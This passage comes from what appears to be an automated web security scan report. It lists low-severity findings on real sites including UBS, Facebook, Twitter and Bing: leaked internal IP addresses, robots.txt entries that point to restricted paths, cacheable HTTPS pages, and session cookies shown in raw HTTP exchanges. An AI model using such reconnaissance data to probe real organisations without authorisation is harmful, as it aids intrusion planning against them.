Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.223.46
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0


17.18. http://www.vimeo.com/moogaloop.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf HTTP/1.1
Host: www.vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Wed, 06 Jul 2011 01:57:04 GMT
X-Server: 10.90.128.70
Vary: Accept-Encoding
Content-Length: 245
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.18/moogaloop.swf._root.....
...[SNIP]...

18. Credit card numbers disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<div class="sa_cc" docId="4637482576447596?false">
...[SNIP]...
<a class="sa_cpt" u="2|1020|4637482576447596|50d8103b,a06cc344">
...[SNIP]...

19. Robots.txt file
There are 9 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


19.1. http://tag.admeld.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 01 Jul 2011 14:31:20 GMT
ETag: "33db8a-1a-4a702df00fe00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Wed, 06 Jul 2011 15:39:06 GMT
Connection: close

User-agent: *
Disallow: /

19.2. http://twitter.com/intent/session

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:28 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Thu, 07 Jul 2011 11:15:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

19.3. http://widgets.digg.com/buttons/count

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Wed, 06 Jul 2011 11:55:06 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=266 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Thu, 07 Jul 2011 11:55:05 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

19.4. http://www.facebook.com/sharer/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.62.162.52
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

19.5. http://www.ibb.ubs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibb.ubs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibb.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:33 GMT
Server: Apache
Last-Modified: Thu, 09 Oct 2008 15:17:41 GMT
ETag: "9e5995-107-458d388a98f40"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /us_html_email
Disallow: /us_html_email/
Disallow: /Conferences/
Disallow: /conferences/
Disallow: /Conferences
Disallow: /conferences
Disallow: /___ADMIN/
Disallow: /
...[SNIP]...

19.6. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Wed, 06 Jul 2011 11:15:26 GMT
Age: 95
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

19.7. http://www.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:01 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:37:46 GMT
ETag: "b039-774-8c38ae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 1908
Content-Type: text/plain
Connection: close

#
# robots.txt file from http://www.ubs.com
# (c) UBS AG, last modification: 17.10.2005
#
# exclude rendered images
# exclude domicile sensitive pages
# exclude service finder pages
#

User-a
...[SNIP]...

19.8. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:09 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:37:46 GMT
ETag: "b039-774-8c38ae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 1908
Content-Type: text/plain
Connection: close

#
# robots.txt file from http://www.ubs.com
# (c) UBS AG, last modification: 17.10.2005
#
# exclude rendered images
# exclude domicile sensitive pages
# exclude service finder pages
#

User-a
...[SNIP]...

19.9. https://www2.ubs.com/1/ssl/e/contact/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:48 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:37:46 GMT
ETag: "b039-774-8c38ae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 1908
Content-Type: text/plain
Connection: close

#
# robots.txt file from http://www.ubs.com
# (c) UBS AG, last modification: 17.10.2005
#
# exclude rendered images
# exclude domicile sensitive pages
# exclude service finder pages
#

User-a
...[SNIP]...

20. Cacheable HTTPS response
There are 22 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


20.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://selfservice.ibb.ubs.com
Path:   /idm/user/ubs/ubs_selfServiceWelcome.jsp

Request

GET /idm/user/ubs/ubs_selfServiceWelcome.jsp HTTP/1.1
Host: selfservice.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:07:45 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.15 mod_perl/1.29 mod_ssl/2.8.14 OpenSSL/0.9.7b
Content-Language: en
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8A446E01118B6D3FECEC5B8203F8A68; Path=/idm; Secure
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html40/loose.dtd">
<html>
<head>



...[SNIP]...

20.2. https://www.ubs.com/1/e/online/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/e/online/contact.html

Request

GET /1/e/online/contact.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:50 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 49559
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 632
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.3. https://www2.ubs.com/1/RenderImage/contact/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/RenderImage/contact/contact

Request

GET /1/RenderImage/contact/contact HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:47 GMT
Vary: Accept-Encoding
Cache-Control: must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: Thu, 07 Jul 2011 13:56:47 GMT
Age: 0
Connection: close
Content-Type: text/plain
Content-Length: 0


20.4. https://www2.ubs.com/1/RenderImage/contact/locations

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/RenderImage/contact/locations

Request

GET /1/RenderImage/contact/locations HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:47 GMT
Vary: Accept-Encoding
Cache-Control: must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: Thu, 07 Jul 2011 13:56:47 GMT
Age: 0
Connection: close
Content-Type: text/plain
Content-Length: 0


20.5. https://www2.ubs.com/1/RenderImage/contact/order

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/RenderImage/contact/order

Request

GET /1/RenderImage/contact/order HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:47 GMT
Vary: Accept-Encoding
Cache-Control: must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: Thu, 07 Jul 2011 13:56:47 GMT
Age: 0
Connection: close
Content-Type: text/plain
Content-Length: 0


20.6. https://www2.ubs.com/1/e/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact.html

Request

GET /1/e/contact.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:32 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 38021
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.7. https://www2.ubs.com/1/e/contact/contactus.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact/contactus.html

Request

GET /1/e/contact/contactus.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:33 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 38287
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.8. https://www2.ubs.com/1/e/contact/locations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact/locations.html

Request

GET /1/e/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/e/contact/order.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; NavLB_EB=ebanking2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982107183:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:55:17 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close
Content-Length: 35554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.9. https://www2.ubs.com/1/e/contact/order.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact/order.html

Request

GET /1/e/contact/order.html HTTP/1.1
Host: www2.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:55:06 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close
Content-Length: 51635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.10. https://www2.ubs.com/1/e/globalam/funds.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/globalam/funds.html

Request

GET /1/e/globalam/funds.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:31 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 28478
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.11. https://www2.ubs.com/1/e/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/index.html

Request

GET /1/e/index.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:35 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 37443
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 4
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

20.12. https://www2.ubs.com/1/e/index/legalinfo2/disclaimer.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/index/legalinfo2/disclaimer.html

Request

GET /1/e/index/legalinfo2/disclaimer.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:36 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 51456
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.13. https://www2.ubs.com/1/e/index/legalinfo2/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/index/legalinfo2/privacy.html

Request

GET /1/e/index/legalinfo2/privacy.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:37 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 48634
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 743
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.14. https://www2.ubs.com/1/e/service_finder/individual.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/service_finder/individual.html

Request

GET /1/e/service_finder/individual.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:40 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 25246
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.15. https://www2.ubs.com/1/e/ubs_ch/private/cards/creditcards/services/customerservice.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/ubs_ch/private/cards/creditcards/services/customerservice.html

Request

GET /1/e/ubs_ch/private/cards/creditcards/services/customerservice.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:39 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 59719
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.16. https://www2.ubs.com/1/f/contact/locations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/f/contact/locations.html

Request

GET /1/f/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:24 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 35793
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="fr">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.17. https://www2.ubs.com/1/g/contact/locations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/g/contact/locations.html

Request

GET /1/g/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:20 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 35287
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="de">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...

20.18. https://www2.ubs.com/1/g/contact/order.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/g/contact/order.html

Request

